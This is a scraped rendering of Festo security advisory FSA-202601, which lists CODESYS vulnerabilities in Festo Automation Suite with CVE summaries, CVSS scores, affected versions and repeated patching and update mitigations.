https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21868 An unsafe deserialization vulnerability exists in the ObjectManager.plugin Project.get_MissingTypes() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21869 An unsafe deserialization vulnerability exists in the Engine.plugin ProfileInformation ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-29239 CODESYS Development System 3 before 3.5.17.0 displays or executes malicious documents or files embedded in libraries without first checking their validity. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-345 Insufficient Verification of Data Authenticity Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2021-29240 The Package Manager of CODESYS Development System 3 before 3.5.17.0 does not check the validity of packages before installation and may be used to install CODESYS packages with malicious content. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-345 Insufficient Verification of Data Authenticity Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-29241 CODESYS Gateway 3 before 3.5.16.70 has a NULL pointer dereference that may result in a denial of service (DoS). View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product versions have been fixed:
Mitigation: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML). https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML). https://certvde.com/en/advisories/VDE-2025-108
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-29242
CODESYS Control Runtime system before 3.5.17.0 has improper input validation. Attackers can send crafted communication packets to change the router's addressing scheme and may re-route, add, remove or change low level communication packages.
Affected Products: CODESYS in Festo Automation Suite
Vendor: FESTO, CODESYS
Product Versions:
FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
Product Status: known_affected
Remediations:
Mitigation: FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:
Mitigation: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to:
Download the latest, patched version of Codesys directly from the official Codesys website.
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied.
Regularly monitor Codesys security advisories and apply updates promptly.
Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product versions have been fixed:
Mitigation: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML). https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML). https://certvde.com/en/advisories/VDE-2025-108
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7.3, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2021-30186
CODESYS V2 runtime system SP before 2.4.7.55 has a Heap-based Buffer Overflow.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-30187
CODESYS V2 runtime system SP before 2.4.7.55 has Improper Neutralization of Special Elements used in an OS Command.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Metrics: CVSS Version 3.1, Base Score 5.3, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVE-2021-30188
CODESYS V2 runtime system SP before 2.4.7.55 has a Stack-based Buffer Overflow.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-30190
CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-30195
CODESYS V2 runtime system before 2.4.7.55 has Improper Input Validation.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-33485
CODESYS Control Runtime system before 3.5.17.10 has a Heap-based Buffer Overflow.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-33486
All versions of the CODESYS V3 Runtime Toolkit for VxWorks from version V3.5.8.0 and before version V3.5.17.10 have Improper Handling of Exceptional Conditions.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-34593
In CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56 unauthenticated crafted invalid requests may result in several denial-of-service conditions. Running PLC programs may be stopped, memory may be leaked, or further communication clients may be blocked from accessing the PLC.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-75 Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-34595
A crafted request with invalid offsets may cause an out-of-bounds read or write access in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition or local memory overwrite.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-823 Use of Out-of-range Pointer Offset
Metrics: CVSS Version 3.1, Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2021-34596
A crafted request may cause a read access to an uninitialized pointer in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
Metrics: CVSS Version 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2021-36763
In CODESYS V3 web server before 3.5.17.10, files or directories are accessible to External Parties.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-552 Files or Directories Accessible to External Parties
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2021-36764
In CODESYS Gateway V3 before 3.5.17.10, there is a NULL Pointer Dereference. Crafted communication requests may cause a Null pointer dereference in the affected CODESYS products and may result in a denial-of-service condition.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2021-36765
In CODESYS EtherNetIP before 4.1.0.0, specific EtherNet/IP requests may cause a null pointer dereference in the downloaded vulnerable EtherNet/IP stack that is executed by the CODESYS Control runtime system.
Affected Products, Vendor, Product Versions, Product Status and Remediations: identical to those listed under CVE-2021-29242.
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.0, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-1965
Multiple products of CODESYS implement a improper error handling. A low privilege remote attacker may craft a request, which is not properly processed by the error handling. In consequence, the file referenced by the request could be deleted. User interaction is not required.
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2022-1989 All CODESYS Visualization versions before V4.2.0.0 generate a login dialog vulnerable to information exposure allowing a remote, unauthenticated attacker to enumerate valid users. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2022-22508 Improper Input Validation vulnerability in multiple CODESYS V3 products allows an authenticated remote attacker to block consecutive logins of a specific type. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L CVE-2022-22513 An authenticated remote attacker can cause a null pointer dereference in the CmpSettings component of the affected CODESYS products which leads to a crash. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 6.5 MEDIUM CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-22514 An authenticated, remote attacker can gain access to a dereferenced pointer contained in a request. The accesses can subsequently lead to local overwriting of memory in the CmpTraceMgr, whereby the attacker can neither gain the values read internally nor control the values to be written. If invalid memory is accessed, this results in a crash. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. 